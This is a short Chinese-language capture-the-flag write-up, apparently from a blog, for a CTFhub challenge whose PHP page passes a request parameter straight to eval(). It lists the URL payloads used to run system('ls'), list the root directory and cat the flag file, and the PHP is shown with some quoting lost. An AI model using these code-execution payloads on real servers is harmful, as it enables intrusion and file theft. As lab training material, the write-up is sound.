CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST'cmd')) {

eval($_REQUEST"cmd");

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
喵了几个咪14 小时前
基于 Flutter 的 Headless CMS 全平台前端架构:技术解析与二次开发导引
前端·flutter·架构
wyu7296114 小时前
SpringBoot八股的一些概念笔记
java·面试
lantian14 小时前
TypeScript 模块系统核心原理:从ESM到CJS,彻底搞懂模块格式与解析逻辑
前端·typescript·ecmascript 6
一只积极向上的小咸鱼14 小时前
TOML、JSON、YAML、INI 配置文件格式总结
java·服务器·json
Lear14 小时前
CSR、SSR、SSG 到底怎么选?一文讲透现代前端三大渲染模式
前端
莫逸风14 小时前
【AgentScope】4.会话(Session)详解
java·llm·agent·agentscope
এ慕ོ冬℘゜14 小时前
前端分页组件完整实现:样式 + 交互 + 逻辑全优化
前端·交互
Ajie'Blog14 小时前
Claude Opus 4.8 发布:Claude Code 能不能接住复杂项目
服务器·前端·javascript·人工智能·ai编程
吴阿福|一人公司14 小时前
类变量和实例变量的命名规范有哪些具体的例子?
java·开发语言
eddietao14 小时前
什么是 fail-fast?什么是 fail-safe?
java·面试